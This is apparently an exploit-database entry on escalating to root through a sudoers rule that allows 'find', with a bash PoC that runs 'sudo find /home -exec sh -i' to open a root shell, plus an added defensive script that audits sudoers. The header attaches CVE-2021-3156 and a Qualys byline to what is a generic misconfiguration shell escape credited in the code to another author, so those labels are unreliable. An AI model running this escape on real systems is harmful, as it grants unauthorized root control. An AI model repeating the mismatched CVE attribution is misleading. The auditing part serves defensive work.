Linux Sudo Command Privilege Escalation

CVE: CVE-2021-3156
Category: CWE-269
Price: $10,000 - $50,000
Severity: High
Author: Qualys Security Advisory
Risk: High
Exploitation Type: Local
Date: 2023-12-24
CPE: cpe:cpe:/o:linux:linux_kernel
CVSS: CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/S:C/C:H/I:H/A:H
EPSS: 0.02192
EPSSP: 0.50148

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2023120045

Below is a copy:

Linux Sudo Command Privilege Escalation
LINUX PRIVILEGE ESCALATION SUDO COMMAND
==============================

What is the exploit?
--------------------

If the attacker cannot directly get root access through other techniques, he might try to compromise one of the users who have SUDO access. Once he has access to any of the SUDO users, he can basically execute any command with root privileges.

Administrators might allow users to run only a few commands through SUDO rather than all of them, but even this configuration can unknowingly introduce vulnerabilities that lead to privilege escalation.

A classic example is assigning SUDO rights to the find command so that another user can search for particular files or logs on the system. The admin might be unaware that the find command has parameters for command execution, so an attacker can use it to execute commands with root privileges.

Exploiting misconfigured SUDO rights to get root access

$ sudo -l    # prints the commands we are allowed to run with SUDO

We can run find, cat and python as SUDO. All of these commands run as root when run with SUDO. If we can somehow escape to a shell through any of them, we get root access.

$ sudo find /home -exec sh -i \;    # find's -exec parameter can be used for arbitrary code execution
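
From the administrator's side, the same misconfiguration can be found by auditing the sudoers policy. The script below is an added example, not part of the original post: it reads sudoers-format lines and flags rules that grant ALL or the three binaries named above (find, cat, python). The function names, the reason strings and the sample rules are constructed for illustration; aliases and continuation lines are not handled.

```sh
#!/bin/sh
# Added example: flag sudoers rules that grant the binaries named on this page.
# Limits: aliases are not expanded and continuation lines are not joined.

# Reads sudoers-format lines on stdin, prints "user: binary (reason)".
audit_sudoers() {
  awk '
    /^[ \t]*#/ || /^[ \t]*$/ { next }            # comments and blank lines
    /^[ \t]*Defaults/ || /_Alias[ \t]/ { next }  # settings and alias definitions
    index($0, "=") == 0 { next }                 # not a user specification
    {
      user = $1
      spec = $0
      sub(/^[^=]*=/, "", spec)                   # drop "user host ="
      n = split(spec, cmds, ",")
      for (i = 1; i <= n; i++) {
        c = cmds[i]
        gsub(/^[ \t]+|[ \t]+$/, "", c)           # trim whitespace
        sub(/^\([^)]*\)[ \t]*/, "", c)           # drop "(runas)"
        sub(/^([A-Z_]+:[ \t]*)+/, "", c)         # drop tags such as NOPASSWD:
        split(c, words, " ")
        bin = words[1]
        sub(/.*\//, "", bin)                     # basename of the command
        reason = ""
        if (bin == "ALL")                  reason = "unrestricted"
        else if (bin == "find")            reason = "-exec runs arbitrary commands"
        else if (bin ~ /^python[0-9.]*$/)  reason = "interpreter runs arbitrary code"
        else if (bin == "cat")             reason = "reads any file"
        if (reason != "") printf "%s: %s (%s)\n", user, bin, reason
      }
    }'
}

# Constructed sample input (not taken from a real system).
sample_sudoers() {
  cat <<'EOF'
# constructed sample
Defaults env_reset
alice ALL=(root) NOPASSWD: /usr/bin/find, /bin/cat
bob   ALL=(ALL) /usr/bin/python3 /opt/report.py
carol ALL=(root) /usr/bin/systemctl restart nginx
dave  ALL=(ALL:ALL) ALL
EOF
}

sample_sudoers | audit_sudoers
```

On a real system, feed it the policy files as root, for example `cat /etc/sudoers /etc/sudoers.d/* | audit_sudoers`.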

POC CODE
------------

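#!/bin/bash
# PoC from the post: confirms that sudo is installed, then runs find through
# sudo and uses -exec to start an interactive shell.

if command -v sudo &> /dev/null; then
  echo
  echo "SUDO PRIVILEGE ESCALATION"
  echo
  echo "Coded By Anezatra"
  echo
  echo "[*] Process ready"
  echo "[*] Executing command ..."
  echo "[+] Shell is opened!"
  echo
else
  echo
  echo "[-] Error: 'sudo' command not found. Not vulnerable."
  exit 1
fi

# Same command as shown above. It only succeeds when the sudoers policy lets
# the current user run find as root. The stray trailing "-exec {} \;" was
# dropped because it would try to execute every file found under /home.
sudo find /home -exec sh -i \;

if [ $? -ne 0 ]; then
  echo
  echo "[-] Error: The find command encountered an issue."
fi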

USAGE
--------
bash poc.sh
